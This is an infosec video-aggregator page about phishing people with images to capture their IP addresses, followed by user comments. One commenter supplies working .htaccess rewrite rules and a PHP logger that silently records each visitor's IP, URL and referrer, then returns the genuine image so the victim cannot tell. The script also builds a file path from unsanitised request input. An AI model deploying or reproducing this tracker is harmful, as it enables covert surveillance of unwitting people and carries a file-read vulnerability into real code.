Description: Even though the title is different from the video name this title i gave on securitytube is a legit name for it as we are using a image to phish victims to view an image to get there IP Address...
In this video i show you how to get someones IP Address using an image...
You need a host to host the 3 images on make changes to the .htaccess file by replace the root.jpg and me.jpg with the names of the images you will be using to get people to go look at.
a sadly i won't post the link to the download if a Moderator wants to add the link to this Description they can the download can be found on the youtube video link in the meantime!
Tags: phishing , IP Address phishing , Social Engineering , zarabyte , phiberoptics ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Cool idea, but I'd have the ips.php file actually return the legit image file. The victim will then never know he hit a logger:
---------------------------- .htaccess ----------------------------
RewriteEngine on
RewriteRule ^(.+)\.jpg$ /logger/ips.php?image=$1&ext=jpg
RewriteRule ^(.+)\.png$ /logger/ips.php?image=$1&ext=png
RewriteRule ^(.+)\.gif$ /logger/ips.php?image=$1&ext=gif
---------------------------- ips.php --------------------------------
---------------------------- end ----------------------------
This will internally redirect all .jpg/.png/.gif files to ips.php where the victims details will be logged. It will then return the original image file.
Cool idea bro. :)
Haha seems the php code was stripped. Here it is:
$log = 'log.txt';
$ip = $_SERVER['REMOTE_ADDR'];
$page = $_SERVER['REQUEST_URI'];
$referer = $_SERVER['REDIRECT_URL'];
$date_time = date(DATE_RFC822);
$log_item = "$date_time\t\t\t$ip\t\t\t$page\t\t\t$referer\n\n";
file_put_contents($log, $log_item, FILE_APPEND | LOCK_EX);
if(isset($_REQUEST['image']) && isset($_REQUEST['ext'])) {
$image = dirname(__FILE__) . "\\" . $_REQUEST['image'] . '.' . $_REQUEST['ext'];
$fp = fopen($image, 'rb');
header("Content-Type: image/" . $_REQUEST['ext']);
header("Content-Length: " . filesize($image));
fpassthru($fp);
}